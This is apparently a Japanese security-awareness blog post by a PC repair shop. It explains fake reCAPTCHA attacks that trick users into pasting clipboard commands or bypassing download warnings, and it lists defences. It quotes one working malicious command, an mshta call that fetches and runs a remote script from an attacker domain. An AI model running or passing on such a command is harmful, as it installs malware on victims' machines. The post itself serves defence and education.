【注意喚起】 偽ReCAPTCHAに気をつけてください! 【私はロボットではありません】

キャプチャ 知恵袋

初めまして、パソコン修理サービス 神戸三宮店です。

最近、ログイン情報などを窃取する、偽のReCAPTCHA(人間かどうか判断するツール)が非常に増えています。

「ReCAPTCHA」ってなに?と思われる方もいるとおもいます。
下のような画像が、サイトにログインする際や、問い合わせページに表示されていたと思います。

キャプチャ

今回は、偽CAPTCHAの危険性について解説します。

偽のReCAPTCHAとは?

「偽のReCAPTCHA」とは、本物のセキュリティ認証画面を装ったサイバー攻撃手法です。

ユーザーに「私はロボットではありません」などのお馴染みの認証画面を見せ、安心感を与えつつ、裏で個人情報の搾取やマルウェア感染を狙います。

一見して正規のセキュリティチェックに見えるため、普段警戒心の高いユーザーでも騙されやすくなっている点が特徴です。

偽ReCAPTCHAに使われる主な技術・仕組み

偽の認証フォームとフィッシング手法

攻撃者はHTMLやJavaScriptを駆使し、本物そっくりな認証フォームをウェブページ上に作成します。

例えば「このサイトにアクセスするにはCAPTCHAを完了してください」と表示し、悪意のあるコードを使用者に実行させます。

一見、認証作業を行っているような文字列が表示されますが、裏ではブラウザ内でログインしているサイトの情報、個人データなどを根こそぎ窃取されます。

マルウェア感染を狙ったスクリプト実行

偽CAPTCHAでは、チェックボックスをクリックした瞬間、裏で悪意のあるスクリプトが動き出すケースもあります。

ユーザーには何も起きていないように見えても、実際にはマルウェアが自動でダウンロード・利用者に実行するよう求め、端末が感染してしまうのです。

このマルウェアにより、遠隔操作、個人情報の抜き取り、さらには身代金要求型ウイルス(ランサムウェア)被害も発生しています。

貼り付けによるコード実行

クリップボード

偽ReCAPTCHA画面でチェックを入れると、JavaScriptによって悪意のあるコマンドがクリップボードに自動コピーされます。

その後、「Windowsキー+Rを押して、Ctrl+VしてEnter」といった指示を表示し、ユーザーにコマンド実行を誘導します。

例えば、以下のようなコマンドがクリップボードに仕込まれる例があります。

mshta https://eprime.shop/s6.mp3

一見.mp3ファイルにアクセスするだけに見えますが、実態は難読化されたPowerShellスクリプトであり、さらなるマルウェアをダウンロード・実行します。

キーボード操作を悪用したブラウザ警告の回避

キーボード

ブラウザは、実行ファイルのダウンロード時に警告ダイアログを表示しますが、これをユーザーに回避させる手口も存在します。

偽ReCAPTCHAは、「B、S、Tab、A、F、Enter」などの特定キー入力を指示。
TabとEnterを使って保存ボタンにフォーカスし、確認なしでダウンロードを進めさせるのです。

実際に報告された被害事例

情報窃取マルウェア「Lumma Stealer」の拡散

2024年、マカフィー社が報告した世界的なキャンペーンでは、偽のCAPTCHAを使ってLumma Stealerを拡散。
違法コピーゲームサイトやフィッシングメールから誘導し、GitHub開発者にも被害が及びました。

Booking.comを装った標的型攻撃

2024年末から2025年初頭にかけ、ホテル予約サイトBooking.comを偽装した攻撃が発生。
リンクをクリックしたユーザーに偽のCAPTCHAを表示し、XWormやAsyncRATなど複数のマルウェアをダウンロードさせました。

偽動画+偽CAPTCHA詐欺

YouTube上の動画を使って、視聴者を偽サイトへ誘導。
そこで偽CAPTCHAをクリックさせ、マルウェアをインストールさせる詐欺が発生し、被害総額は7億円超にのぼっています。

偽CAPTCHAに対する有効な対策方法

ユーザー側の対策

  • 不審な指示に従わない
    ReCAPTCHAに「Win+R」「Ctrl+V」などの操作を求められたら、即座にページを閉じましょう。
    本物はキーボード操作を求めません。
  • URLと証明書を確認する
    正規ドメインかどうかを確認し、「https://」と鍵マークをチェックしましょう。紛らわしい偽ドメイン(例:g〇〇gle.com)にも注意です。
  • セキュリティソフト・ブラウザ拡張機能を活用する
    悪質なサイトをブロックする拡張機能やポップアップブロック機能を有効にしておきましょう。

企業・開発者側の対策

  • 社員教育を徹底する
    最新のフィッシング・偽ReCAPTCHA手口を周知し、異常があった場合に迅速に報告できる体制を整えます。
  • 技術的な防御策を講じる
    • Webフィルタリングで悪質サイトを遮断
    • mshta.exeなど不要な実行ツールを無効化
    • EDRや最新のアンチウイルス製品でスクリプト実行の異常を検知・遮断
  • ソフトウェアを最新状態に保つ
    OSやブラウザを常に最新にアップデートし、脆弱性を突かれないようにします。
  • 権限管理を徹底する
    最小権限原則を適用し、一般ユーザーに管理者権限を与えない運用を徹底します。
  • インシデント対応体制を整備する
    異常検知時に即座にネットワーク隔離・フォレンジック調査が行える体制を整えましょう。

まとめ

偽ReCAPTCHAによる攻撃は年々巧妙化し、手口も多様化しています。

しかし、ユーザー側の冷静な対応と企業側の多層的な防御体制によって、リスクは大幅に低減できます。

常に最新の脅威情報に注意を払い、基本的なセキュリティ意識を持ち続けることが、被害を未然に防ぐ最大の鍵となるでしょう。

コメント

タイトルとURLをコピーしました